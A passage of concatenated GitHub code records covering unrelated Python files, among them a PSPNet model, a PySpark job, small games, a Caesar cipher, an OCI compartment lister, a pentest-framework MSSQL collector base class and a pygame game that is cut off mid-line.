aux_output = nn.functional.interpolate(aux_output, 
size=(h, w), mode='bilinear', align_corners=True)\n\n return {\"output\": x, \"aux_output\": aux_output}\n return {\"output\": x}\n\n\nif __name__ == \"__main__\":\n model = Pspnet(num_classes=3, aux_loss=True)\n a = torch.ones([1, 3, 224, 224])\n outputs = model(a)\n print(outputs[\"output\"].shape)\n\n","repo_name":"WYH67/Semantic-segmentation","sub_path":"PsPNet/PsPNet.py","file_name":"PsPNet.py","file_ext":"py","file_size_in_byte":4939,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"4698486576","text":"#!/usr/bin/env python3\n\"\"\"sortedAppreciateSQL.py\"\"\"\n\nimport argparse\nimport pyspark\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructType, StructField, StringType, IntegerType\nimport time\n\n# Parse the arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--input\", help=\"the input path\")\nparser.add_argument(\"--output\", help=\"the output path\")\n\nargs = parser.parse_args()\n\ninput_path, output_path = args.input, args.output\n\n# Create the SparkSession\nspark = SparkSession.builder.appName(\"sortedAppreciateSQL\").getOrCreate()\n\n# Use sql to read the input file\nschema = StructType([\n StructField(\"Id\", IntegerType(), True),\n StructField(\"productId\", StringType(), True),\n StructField(\"userId\", StringType(), True),\n StructField(\"profileName\", StringType(), True),\n StructField(\"helpfulnessNumerator\", IntegerType(), True),\n StructField(\"helpfulnessDenominator\", IntegerType(), True),\n StructField(\"score\", StringType(), True),\n StructField(\"time\", StringType(), True),\n StructField(\"summary\", StringType(), True),\n StructField(\"text\", StringType(), True)\n])\n\n# calculate time elapsed\nstart_time = time.time()\n# ================================\ninput_df = spark.read.option(\"quote\", \"\\\"\") \\\n .csv(input_path, header=False, schema=schema) \\\n .cache()\n\n# Use sql to filter the input file\nfiltered_df = input_df.select(\"userId\", \"helpfulnessNumerator\", \"helpfulnessDenominator\").filter(\"helpfulnessNumerator >= 0 and helpfulnessDenominator > 0 and helpfulnessNumerator <= helpfulnessDenominator\") \\\n .withColumn(\"appreciate\", input_df[\"helpfulnessNumerator\"] / input_df[\"helpfulnessDenominator\"]) \\\n .select(\"userId\", \"appreciate\").groupBy(\"userId\").avg(\"appreciate\").orderBy(\"avg(appreciate)\", ascending=False)\n# ================================\nend_time = time.time()\n\n# Print the time elapsed\nprint(\"Time elapsed: \", end_time - start_time)\n# Show the first 10 rows of the result\nfiltered_df.show(10)\n\n# Write the output file\nfiltered_df.write.csv(output_path)","repo_name":"LeafTeamMates/BigData1","sub_path":"Job2/Spark/sortedAppreciateSQL.py","file_name":"sortedAppreciateSQL.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13585100556","text":"from random import randint\nfrom collections import deque\nimport pickle\nimport os\n\ntarget = randint(0,100)\n\nif os.path.exists('history.txt'):\n\t# use load() to deserialize the data from the file\n\td = pickle.load(open('history.txt','rb'))\n\t#print('exists')\nelse:\n\td = deque([],5)\n\t#print('does not exist')\n\ndef guess(num):\n\tif num == target:\n\t\tprint('well done')\n\t\treturn 1\n\telif num > target:\n\t\tprint('your guess is bigger than the target')\n\telse:\n\t\tprint('your guess is smaller than the target')\n\treturn 0\nwhile True:\n\tline = input(\"input:\")\n\tif line.isdigit():\n\t\tnum = 
int(line)\n\t\td.append(num)\n\t\tif guess(num):\n\t\t\tbreak\n\telif line == \"history\" or line == \"h?\":\n\t\tprint(list(d))\n\telif line == 'quit':\n\t\tbreak\n# use dump() to serialize the data to the file\nfw = open('history.txt','wb') \npickle.dump(d, fw) \nfw.close() \n","repo_name":"feiwenli/PythonLearning","sub_path":"EfficientCoding/2-7.py","file_name":"2-7.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74914240740","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.exc import OperationalError\nfrom base import Base\nfrom models.news import News\n\nimport json\n\n# get data from json config file\nwith open('config.json') as c:\n config = json.load(c)\n\n# get database config\ndb_config = config['database']\n\n# set connection to database\nengine = create_engine(\n 'postgresql://{0}:{1}@{2}:{3}/{4}'.format(\n db_config['username'],\n db_config['password'],\n db_config['host'],\n db_config['port'],\n db_config['database']\n )\n)\n\n# check if module was connected to database\ntry:\n engine.connect().close()\n print('connected')\n# or raise exception\nexcept OperationalError as e:\n exit(e)\n\n# create tables by models if not exist\nBase.metadata.create_all(engine, checkfirst=True)\n\n","repo_name":"aynm142/news_parser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39340903754","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Time : 2018/6/11 10:49\r\n# @Author : Gan\r\n# @File : export_to_db.py\r\n\r\n\r\nimport os\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nfrom tool import KunlunFormat\r\n\r\ndata_dir = 'data/suining'\r\n\r\nedge = pd.DataFrame()\r\nvertex = pd.DataFrame()\r\nfor file in os.listdir(data_dir):\r\n if file.startswith('edge_info'):\r\n edge = edge.append(pd.read_csv(os.path.join(data_dir, file), encoding='utf8'))\r\n elif file.startswith('vertex_info'):\r\n vertex = vertex.append(pd.read_csv(os.path.join(data_dir, file), encoding='utf8'))\r\n\r\nid_list = np.arange(len(vertex))\r\nvertex['uid'] = id_list\r\nvertex['uid'] = vertex['uid'].apply(str)\r\n\r\n\r\ndef lookup_label(name):\r\n row = vertex[vertex['name'] == name].iloc[0]\r\n return row['label']\r\n\r\n\r\ndef lookup_uid(name):\r\n row = vertex[vertex['name'] == name].iloc[0]\r\n return row['uid']\r\n\r\n\r\nedge['start_type'] = edge['start_name'].apply(lambda x: lookup_label(x))\r\nedge['end_type'] = edge['end_name'].apply(lambda x: lookup_label(x))\r\nedge['start_uid'] = edge['start_name'].apply(lambda x: lookup_uid(x))\r\nedge['end_uid'] = edge['end_name'].apply(lambda x: lookup_uid(x))\r\n\r\nedge = edge[['start_type', 'start_uid', 'end_type', 'end_uid', 'relation']]\r\nedge['start_time'] = '2007/01/01'\r\nedge['end_time'] = '2007/01/01'\r\n\r\nkl = KunlunFormat()\r\nvertex_kl_dict, vertex_kl_meta = kl.parse_vertex(vertex, col_rel='label')\r\nedge_kl_dict, edge_kl_meta = kl.parse_edge(edge, start_label='start_type', end_label='end_type',\r\n relation_type='relation')\r\nmeta = pd.concat([vertex_kl_meta, edge_kl_meta])\r\n\r\n#################################################################################\r\n# Export as CSV\r\n#################################################################################\r\nresult_dir = 'result/csv_format'\r\ntry:\r\n os.makedirs(os.path.join(data_dir, result_dir))\r\nexcept FileExistsError:\r\n 
pass\r\n\r\nkl.to_csv(os.path.join(data_dir, result_dir), vertex_kl_dict, edge_kl_dict, meta)\r\n","repo_name":"XuJ/KnowledgeGraphExample","sub_path":"export_to_db.py","file_name":"export_to_db.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38850761458","text":"# -*- coding: utf-8 -*-\n\"\"\"\nimplements all base functionality for Microsoft SQL Server (MSSQL) collectors\n\"\"\"\n\n__author__ = \"Lukas Reiter\"\n__license__ = \"GPL v3.0\"\n__copyright__ = \"\"\"Copyright 2018 Lukas Reiter\n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see .\n\"\"\"\n__version__ = 0.1\n\nfrom typing import List\nfrom database.model import Service\nfrom database.model import ServiceState\nfrom database.model import ProtocolType\nfrom collectors.os.modules.core import BaseCollector\nfrom collectors.os.modules.core import BaseHydra\nfrom collectors.os.modules.core import ServiceDescriptorBase\nfrom collectors.os.modules.core import BaseNmap\nfrom collectors.os.modules.core import BaseExtraServiceInfoExtraction\nfrom collectors.core import XmlUtils\nfrom sqlalchemy.orm.session import Session\n\n\nclass MsSqlServiceDescriptor(ServiceDescriptorBase):\n \"\"\"\n This class describes how an MSSQL service looks like\n \"\"\"\n\n def __init__(self):\n super().__init__(default_tcp_ports=[1433, 1434, 9152],\n default_udp_ports=[1433, 1434, 9152],\n nmap_tcp_service_names=[\"^ms\\-sql\\-.*$\"],\n nmap_udp_service_names=[\"^ms\\-sql\\-.*$\"],\n nessus_tcp_service_names=[\"^mssql$\", \"^ms\\-sql\\-.*$\"],\n nessus_udp_service_names=[\"^mssql$\", \"^ms\\-sql\\-.*$\"])\n\n\nclass BaseMsSqlCollector(BaseCollector):\n \"\"\"\n This is the base class for all MSSQL collectors\n \"\"\"\n\n def __init__(self, priority, timeout, **kwargs):\n super().__init__(priority=priority,\n timeout=timeout,\n service_descriptors=MsSqlServiceDescriptor(),\n **kwargs)\n\n\nclass BaseMsSqlHydra(BaseHydra):\n \"\"\"\n This class implements basic functionality for MSSQL collectors that use Hydra.\n \"\"\"\n def __init__(self, priority, timeout, **kwargs):\n super().__init__(priority=priority,\n timeout=timeout,\n service_descriptors=MsSqlServiceDescriptor(),\n **kwargs)\n\n\nclass BaseMsSqlNmap(BaseNmap):\n \"\"\"\n This class implements basic functionality for rpcbind collectors that use Nmap.\n \"\"\"\n def __init__(self, priority,\n timeout,\n nmap_xml_extractor_classes: List[BaseExtraServiceInfoExtraction],\n **kwargs):\n super().__init__(priority=priority,\n timeout=timeout,\n service_descriptors=MsSqlServiceDescriptor(),\n nmap_xml_extractor_classes=nmap_xml_extractor_classes,\n **kwargs)\n\n\nclass MsSqlExtraInfoExtraction(BaseExtraServiceInfoExtraction):\n \"\"\"\n This class extracts extra information (e.g. 
user names, SMB shares) from MS-SQL services.\n \"\"\"\n MSSQL_TCP_PORTS = \"ms-sql-info\"\n MSSQL_NTLM_INFO = \"ms-sql-ntlm-info\"\n MSSQL_SERVICE_NAME = [\"ms-sql-m\", \"ms-sql-s\"]\n\n def __init__(self, session: Session, service: Service, **args):\n super().__init__(session, service, **args)\n\n def _extract_sql_info(self, host_tag):\n \"\"\"This method extracts the required information.\"\"\"\n script = host_tag.findall(\"*/script/[@id='{}']\".format(MsSqlExtraInfoExtraction.MSSQL_TCP_PORTS))\n script_count = len(script)\n if script_count == 1:\n for table in script[0].findall(\"./table\"):\n tcp_port = XmlUtils.get_xml_text(table.findall(\".//*[@key='TCP port']\"))\n if tcp_port:\n service = self._domain_utils.add_service(session=self._session,\n port=tcp_port,\n protocol_type=ProtocolType.tcp,\n state=ServiceState.Open,\n host=self._service.host,\n source=self._source,\n report_item=self._report_item)\n if service:\n service.nmap_service_name = MsSqlExtraInfoExtraction.MSSQL_SERVICE_NAME[0]\n elif script_count > 1:\n raise NotImplementedError(\"expected only one '/script/[@id='{}']' entry.\".format(\n MsSqlExtraInfoExtraction.MSSQL_TCP_PORTS))\n\n def _extract_ntlm_info(self, port_tag) -> None:\n \"\"\"This method extracts NTLM information\"\"\"\n super()._extract_ntlm_info(port_tag, tag_id=MsSqlExtraInfoExtraction.MSSQL_NTLM_INFO)\n\n def extract(self, **kwargs):\n \"\"\"This method extracts disclosed information from MS-SQL services.\"\"\"\n self._extract_sql_info(kwargs[\"host_tag\"])\n self._extract_ntlm_info(kwargs[\"port_tag\"])","repo_name":"chopicalqui/KaliIntelligenceSuite","sub_path":"kis/collectors/os/modules/mssql/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5428,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"35"} +{"seq_id":"3132984586","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10**6)\n\nV, E = map(int, input().split())\nG = [[] for v in range(V+1)]\nvisited = [False] * (V+1)\n\nfor _ in range(E):\n s, e = map(int, input().split())\n G[s].append(e)\n G[e].append(s) # bidirectional\n\ndef DFS(start):\n visited[start] = True\n for vertex in G[start]:\n if not visited[vertex]:\n DFS(vertex)\n\ndef BFS(start):\n queue = [start]\n\n while queue:\n now = queue.pop(0)\n if visited[now]:\n continue\n visited[now] = True\n\n for next in G[now]:\n if not visited[next]:\n queue.append(next)\n\nnum = [5, 6, 3, 4, 1, 2]\n\ndef Bsearch(num : list, key):\n num.sort()\n front = 0\n rear = len(num) - 1\n\n while front <= rear:\n mid = (front + rear) // 2\n if num[mid] == key:\n return mid\n \n elif num[mid] > key:\n rear = mid - 1\n\n else:\n front = mid + 1\n \n return -1\n\n\n\n\n\n\n\n \n\n","repo_name":"MTsauRus/TIL","sub_path":"algorithms/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"74679635619","text":"# Name: Hajer Qara\n# Date: 5/29/2022\n# File Name: CaesarCipher.py\n\n# Caesar Cipher was a past assignment that enabled a user \n# to input a string of text to encrypt or decrypt\n# Note: Users are advised to use uppercase 'E' and uppercase 'D' when making a selection \n\ndef encryptstr(message):\n #declare variables\n newstring=str()\n ascii_letter_value=int()\n one_letter=str()\n new_ascii_value=int()\n #loop to assign new ASCII value\n for index in range(0,len(message)):\n one_letter= message[index]\n ascii_letter_value=ord(one_letter)\n #checking if the letter is Z 
or z\n if ascii_letter_value==122:\n new_ascii_value=97\n elif ascii_letter_value==90:\n new_ascii_value=65\n #assigning a new ascii value if not Z or z\n else:\n new_ascii_value= ascii_letter_value + 1\n #creating the new string\n newstring= newstring + chr(new_ascii_value)\n print(newstring)\n\n return newstring\n\ndef decryptstring(message):\n newstring=str()\n ascii_letter_value=int()\n one_letter=str()\n new_ascii_value=int()\n #loop to assign new ASCII value\n for index in range(0,len(message)):\n one_letter= message[index]\n ascii_letter_value=ord(one_letter)\n #checking if the letter is Z or z\n if ascii_letter_value==97:\n new_ascii_value=122\n elif ascii_letter_value==65:\n new_ascii_value=90\n #assigning a new ascii value if not Z or z\n else:\n new_ascii_value= ascii_letter_value - 1\n #creating the new string\n newstring= newstring + chr(new_ascii_value)\n print(newstring)\n\n return newstring\n\n\ndef main():\n message=str()\n userchoice=str()\n message=input(\"Enter text: \")\n userchoice=input(\"(E)ncrypt or (D)ecrypt? \")\n\n if userchoice == \"E\":\n encryptstr(message)\n else:\n decryptstring(message)\n \n\nmain()\n \n","repo_name":"HajerQara/CaesarCipher","sub_path":"CaesarCipher.py","file_name":"CaesarCipher.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14947617953","text":"#!/usr/bin/env python3\n\n# --------------------------------------------------------------------------------------------------------------\n# This script lists all the compartments and sub-compartments names and IDs in an OCI tenant using OCI Python SDK\n# The output is formatted with colors and indents to easily identify parents of sub-compartments\n# Note: OCI tenant given by an OCI CLI PROFILE\n# It is much faster than the corresponding Bash script on tenant with many compartments\n#\n# Author : Christophe Pauliat\n# Platforms : MacOS / Linux\n# prerequisites : - Python 3 with OCI Python SDK installed\n# - OCI config file configured with profiles\n# Versions\n# 2019-10-18: Initial Version\n# 2020-04-24: minor code enhancements\n# --------------------------------------------------------------------------------------------------------------\n\n# -- import\nimport oci\nimport sys\n\n# ---------- Colors for output\nCOLOR_YELLOW=\"\\033[93m\"\nCOLOR_RED=\"\\033[91m\"\nCOLOR_GREEN=\"\\033[32m\"\nCOLOR_NORMAL=\"\\033[39m\"\nCOLOR_CYAN=\"\\033[96m\"\nCOLOR_BLUE=\"\\033[94m\"\nCOLOR_GREY=\"\\033[90m\"\n\n# ---------- variables\nconfigfile = \"~/.oci/config\" # Define config file to be used.\nflag=[0,0,0,0,0,0,0,0,0,0]\n\n# ---------- functions\ndef usage():\n print (\"Usage: {} [-d] OCI_PROFILE\".format(sys.argv[0]))\n print (\"\")\n print (\" If -d is provided, deleted compartments are also listed.\")\n print (\" If not, only active compartments are listed.\")\n print \n print (\"note: OCI_PROFILE must exist in {} file (see example below)\".format(configfile))\n print (\"\")\n print (\"[EMEAOSCf]\")\n print (\"tenancy = ocid1.tenancy.oc1..aaaaaaaaw7e6nkszrry6d5hxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\")\n print (\"user = ocid1.user.oc1..aaaaaaaayblfepjieoxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\")\n print (\"fingerprint = 19:1d:7b:3a:17:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx\")\n print (\"key_file = /Users/cpauliat/.oci/api_key.pem\")\n print (\"region = eu-frankfurt-1\")\n exit (1)\n\ndef get_cpt_name_and_state_from_id(cpt_id):\n for c in compartments:\n if (c.id == cpt_id):\n return c.name, 
c.lifecycle_state\n return\n\ndef list_compartments(parent_id, level):\n # level = 0 for root, 1 for 1st level compartments, ...\n Debug=False\n\n if (Debug):\n print (\"NEW ITER: DEBUG: level=%d parent_id=%s \" % (level, parent_id), end='')\n print (\"flag=\",flag)\n \n i=1\n while i < level:\n if flag[i] == 0:\n print (COLOR_CYAN+\"│ \"+COLOR_NORMAL,end='')\n else:\n print (\" \",end='')\n i += 1 \n\n if level > 0:\n cptname, state = get_cpt_name_and_state_from_id (parent_id) \n \n if flag[level] == 0:\n print (COLOR_CYAN+\"├───── \"+COLOR_NORMAL,end='')\n else:\n print (COLOR_CYAN+\"└───── \"+COLOR_NORMAL,end='')\n else:\n cptname='root'\n state=\"ACTIVE\"\n \n if state == \"ACTIVE\":\n print (COLOR_GREEN+cptname+COLOR_NORMAL+\" \"+parent_id+COLOR_YELLOW+\" ACTIVE\"+COLOR_NORMAL)\n else:\n print (COLOR_BLUE+cptname+COLOR_GREY+\" \"+parent_id+COLOR_RED+\" DELETED\"+COLOR_NORMAL)\n\n # get the list of ids of the direct sub-compartments\n sub_compartments_ids_list=[]\n for c in compartments:\n if c.compartment_id == parent_id:\n if LIST_DELETED or c.lifecycle_state != \"DELETED\":\n sub_compartments_ids_list.append(c.id)\n \n # then for each of those cpt ids, display the sub-compartments details\n if (Debug):\n print (\"DEBUG: len=%d\" % len(sub_compartments_ids_list))\n i=1\n for cid in sub_compartments_ids_list: \n # if processing the last sub dir\n if (Debug):\n print (\"DEBUG: test child %s\" % cid) \n if i == len(sub_compartments_ids_list):\n flag[level+1]=1\n else:\n flag[level+1]=0\n if (Debug):\n print (\"DEBUG: flag\", flag)\n list_compartments(cid, level+1)\n i += 1\n\n# ---------- main\nLIST_DELETED=False\n\n# -- parsing arguments\nif (len(sys.argv) != 2) and (len(sys.argv) != 3):\n usage()\n\nif (len(sys.argv) == 2):\n profile = sys.argv[1] \nelif (len(sys.argv) == 3):\n profile = sys.argv[2]\n if (sys.argv[1] == \"-d\"):\n LIST_DELETED=True\n else:\n usage()\n \n# -- get OCI Config\ntry:\n config = oci.config.from_file(configfile,profile)\n\nexcept:\n print (\"ERROR: profile '{}' not found in config file {} !\".format(profile,configfile))\n exit (2)\n\nIdentityClient = oci.identity.IdentityClient(config)\nuser = IdentityClient.get_user(config[\"user\"]).data\nRootCompartmentID = user.compartment_id\n\n# -- get list of compartments with all sub-compartments\nresponse = oci.pagination.list_call_get_all_results(IdentityClient.list_compartments,RootCompartmentID,compartment_id_in_subtree=True)\ncompartments = response.data\n\nlist_compartments(RootCompartmentID,0)\n\nexit (0)\n","repo_name":"hackom1234/oci","sub_path":"my-oci-scripts/OCI_compartments_list_formatted.py","file_name":"OCI_compartments_list_formatted.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"74363249061","text":"from functools import partial\n\nfrom utils import *\nfrom MultilabelKernelPerceptron import MultilabelKernelPerceptron\nfrom MNIST import label_set\n\n\ndef tune(xs, ys, reduction, approach):\n # Keeping the same split as MNIST\n validation_size = int(reduction * 1 / 7)\n\n x_train, y_train = xs[:-validation_size], ys[:-validation_size]\n x_val, y_val = xs[-validation_size:], ys[-validation_size:]\n\n results = []\n\n for epochs in EPOCHS:\n for degree in DEGREES:\n perceptron = MultilabelKernelPerceptron(\n partial(polynomial, degree=degree),\n label_set,\n epochs,\n x_train,\n y_train,\n approach,\n DEVICE\n )\n\n perceptron.fit()\n validation_error = perceptron.error(x_val, y_val)\n 
results.append((validation_error, epochs, degree))\n\n return min(results, key=lambda x: int(x[0] * 1000))[1:]\n","repo_name":"lfoscari/mnist-perceptron","sub_path":"HyperparameterTuning.py","file_name":"HyperparameterTuning.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29370709312","text":"import pygame\nimport random\nfrom collections import deque\nimport reactor_colors as color\n\n\ndef run_reactor(surface, surface_width, surface_height, margin, margin_color,\n scaler, clock, fps,\n door_speed, score_goal, time_limit):\n\n # variables\n pygame.display.set_caption(\"REACTOR\")\n door_thinness = 10\n margin_return_nominal_state = 0\n margin_return_nominal_state_duration = 25\n disc_color_rising = True\n disc_color = 200\n landing = False\n disc_distance = 500 # starting size used for placing new disc after scoring\n lives = 10\n score = 0\n collisions = 0\n collision_result_front, collision_result_back = False, False\n particle, all_particles, modded_particles = [], [], []\n current_disc_color = color.blue\n disc_explosion_color = (0, 0, 0)\n timer_marker = pygame.time.get_ticks() # starter tick\n current_react_data = {}\n react_fade_speed = .25\n react_movement_speed = .25\n shadow_delay = 1\n shadow_coord_1 = deque([], maxlen=shadow_delay)\n shadow_coord_2 = deque([], maxlen=shadow_delay * 2)\n shadow_coord_3 = deque([], maxlen=shadow_delay * 3)\n shadow_coord_4 = deque([], maxlen=shadow_delay * 4)\n shadow_coord_5 = deque([], maxlen=shadow_delay * 5)\n shadow_coord_6 = deque([], maxlen=shadow_delay * 6)\n shadow_coord_7 = deque([], maxlen=shadow_delay * 7)\n shadow_coord_8 = deque([], maxlen=shadow_delay * 8)\n shadow_coord_9 = deque([], maxlen=shadow_delay * 9)\n shadow_coord_10 = deque([], maxlen=shadow_delay * 10)\n all_shadows = [shadow_coord_10,\n shadow_coord_9,\n shadow_coord_8,\n shadow_coord_7,\n shadow_coord_6,\n shadow_coord_5,\n shadow_coord_4,\n shadow_coord_3,\n shadow_coord_2,\n shadow_coord_1]\n game_over = False\n\n class Doors:\n def __init__(self):\n self.width_TB = (surface_width // 2) - 1\n self.height_TB = surface_height // door_thinness\n self.width_LR = surface_height // door_thinness\n self.height_LR = (surface_height // 2) - 1\n self.true_door_speed = door_speed\n self.door_speed = int(self.true_door_speed * scaler)\n self.switcher = 0\n self.openings = 0\n self.rest_period = 25\n self.current_rest_period = -100\n self.random_range = random.randint(10, 100)\n self.locked = False\n self.start_mark_open = 0\n self.start_timer = True\n self.last_open = 0\n\n # top doors\n self.x_T_L = 0\n self.y_T_L = 0\n self.x_T_R = (surface_width // 2) + 2\n self.y_T_R = 0\n self.rect_T_L = pygame.Rect(self.x_T_L, self.y_T_L, self.width_TB, self.height_TB)\n self.rect_T_R = pygame.Rect(self.x_T_R, self.y_T_R, self.width_TB, self.height_TB)\n self.direction_T = 0\n self.rest_period_T = 0\n self.rest_T = True\n\n # bottom doors\n self.x_B_L = 0\n self.y_B_L = surface_height - (surface_height // door_thinness)\n self.x_B_R = (surface_width // 2) + 2\n self.y_B_R = surface_height - (surface_height // door_thinness)\n self.rect_B_L = pygame.Rect(self.x_B_L, self.y_B_L, self.width_TB, self.height_TB)\n self.rect_B_R = pygame.Rect(self.x_B_R, self.y_B_R, self.width_TB, self.height_TB)\n self.direction_B = 0\n self.rest_period_B = 0\n self.rest_B = True\n\n # left doors\n self.x_L_T = 0\n self.y_L_T = 0\n self.x_L_B = 0\n self.y_L_B = (surface_height // 2) + 2\n self.rect_L_T = 
pygame.Rect(self.x_L_T, self.y_L_T, self.width_LR, self.height_LR)\n self.rect_L_B = pygame.Rect(self.x_L_B, self.y_L_B, self.width_LR, self.height_LR)\n self.direction_L = 0\n self.rest_period_L = 0\n self.rest_L = True\n\n # right doors\n self.x_R_T = surface_width - self.width_LR\n self.y_R_T = 0\n self.x_R_B = surface_width - self.width_LR\n self.y_R_B = (surface_height // 2) + 2\n self.rect_R_T = pygame.Rect(self.x_R_T, self.y_R_T, self.width_LR, self.height_LR)\n self.rect_R_B = pygame.Rect(self.x_R_B, self.y_R_B, self.width_LR, self.height_LR)\n self.direction_R = 0\n self.rest_period_R = 0\n self.rest_R = True\n\n def slide_T(self):\n\n if self.switcher == 0:\n if self.rest_T:\n self.current_rest_period += 1\n\n if self.current_rest_period > self.rest_period:\n self.current_rest_period = 0\n self.rest_T = False\n\n if not self.rest_T:\n result_t = random.randint(1, random.randint(10, 500))\n if result_t == 1:\n self.rest_R, self.rest_L, self.rest_B = True, True, True\n self.switcher = 1\n self.direction_T = 1\n\n elif self.switcher == 1:\n\n if self.rect_T_L.right > 0 and self.direction_T == 1 and not self.locked:\n\n if self.start_timer:\n self.start_mark_open = pygame.time.get_ticks()\n self.start_timer = False\n self.last_open = self.switcher\n\n self.rect_T_L.x -= self.door_speed\n self.rect_T_R.x += self.door_speed\n\n elif self.rect_T_L.right <= 0:\n self.direction_T = -1\n\n if self.direction_T == -1:\n self.rect_T_L.x += self.door_speed\n self.rect_T_R.x -= self.door_speed\n\n if self.rect_T_L.left == 0:\n self.direction_T = 0\n self.rest_T = True\n self.current_rest_period = 0\n self.openings += 1\n self.switcher = 0\n self.start_timer = True\n\n return self.rect_T_L.right, self.rect_T_L.topright[-1] - margin, self.rect_T_L.bottomright[-1]\n\n def slide_B(self):\n\n if self.switcher == 0:\n if self.rest_B:\n self.current_rest_period += 1\n\n if self.current_rest_period > self.rest_period:\n self.current_rest_period = 0\n self.rest_B = False\n\n if not self.rest_B:\n result_b = random.randint(1, random.randint(10, 500))\n if result_b == 1:\n self.rest_R, self.rest_L, self.rest_T = True, True, True\n self.switcher = 2\n self.direction_B = 1\n\n elif self.switcher == 2:\n\n if self.rect_B_L.right > 0 and self.direction_B == 1 and not self.locked:\n\n if self.start_timer:\n self.start_mark_open = pygame.time.get_ticks()\n self.start_timer = False\n self.last_open = self.switcher\n\n self.rect_B_L.x -= self.door_speed\n self.rect_B_R.x += self.door_speed\n\n elif self.rect_B_L.right <= 0:\n self.direction_B = -1\n\n if self.direction_B == -1:\n self.rect_B_L.x += self.door_speed\n self.rect_B_R.x -= self.door_speed\n\n if self.rect_B_L.left == 0:\n self.direction_B = 0\n self.rest_B = True\n self.current_rest_period = 0\n self.openings += 1\n self.switcher = 0\n self.start_timer = True\n\n return self.rect_B_L.right, self.rect_B_L.bottomright[-1] - margin, self.rect_B_L.topright[-1]\n\n def slide_L(self):\n\n if self.switcher == 0:\n if self.rest_L:\n self.current_rest_period += 1\n\n if self.current_rest_period > self.rest_period:\n self.current_rest_period = 0\n self.rest_L = False\n\n if not self.rest_L:\n result_l = random.randint(1, random.randint(10, 500))\n if result_l == 1:\n self.rest_R, self.rest_B, self.rest_T = True, True, True\n self.switcher = 3\n self.direction_L = 1\n\n elif self.switcher == 3:\n\n if self.rect_L_T.bottom > 0 and self.direction_L == 1 and not self.locked:\n\n if self.start_timer:\n self.start_mark_open = pygame.time.get_ticks()\n 
self.start_timer = False\n self.last_open = self.switcher\n\n self.rect_L_T.y -= self.door_speed\n self.rect_L_B.y += self.door_speed\n\n elif self.rect_L_T.bottom <= 0:\n self.direction_L = -1\n\n if self.direction_L == -1:\n self.rect_L_T.y += self.door_speed\n self.rect_L_B.y -= self.door_speed\n\n if self.rect_L_T.top == 0:\n self.direction_L = 0\n self.rest_L = True\n self.current_rest_period = 0\n self.openings += 1\n self.switcher = 0\n self.start_timer = True\n\n return self.rect_L_T.bottomleft[0] + margin, self.rect_L_T.bottom, self.rect_L_T.bottomright[0]\n\n def slide_R(self):\n\n if self.switcher == 0:\n if self.rest_R:\n self.current_rest_period += 1\n\n if self.current_rest_period > self.rest_period:\n self.current_rest_period = 0\n self.rest_R = False\n\n if not self.rest_R:\n result_r = random.randint(1, random.randint(10, 500))\n if result_r == 1:\n self.rest_L, self.rest_B, self.rest_T = True, True, True\n self.switcher = 4\n self.direction_R = 1\n\n elif self.switcher == 4:\n\n if self.rect_R_T.bottom > 0 and self.direction_R == 1 and not self.locked:\n\n if self.start_timer:\n self.start_mark_open = pygame.time.get_ticks()\n self.start_timer = False\n self.last_open = self.switcher\n\n self.rect_R_T.y -= self.door_speed\n self.rect_R_B.y += self.door_speed\n\n elif self.rect_R_T.bottom <= 0:\n self.direction_R = -1\n\n if self.direction_R == -1:\n self.rect_R_T.y += self.door_speed\n self.rect_R_B.y -= self.door_speed\n\n if self.rect_R_T.top == 0:\n self.direction_R = 0\n self.rest_R = True\n self.current_rest_period = 0\n self.openings += 1\n self.switcher = 0\n self.start_timer = True\n\n return self.rect_R_T.bottomright[0] - margin, self.rect_R_T.bottom, self.rect_R_T.bottomleft[0]\n\n def draw_doors(self):\n all_doors = [self.rect_T_L, self.rect_T_R, self.rect_B_L, self.rect_B_R,\n self.rect_L_T, self.rect_L_B, self.rect_R_T, self.rect_R_B]\n return [pygame.draw.rect(surface, color.doors_color, door) for door in all_doors]\n\n def get_openings(self):\n return self.openings\n\n class Disc:\n def __init__(self):\n self.true_disc_radius_size = 100\n self.disc_radius_size = self.true_disc_radius_size * scaler\n self.x = (surface_width // 2) - self.disc_radius_size\n self.y = (surface_height // 2) - self.disc_radius_size\n self.disc = 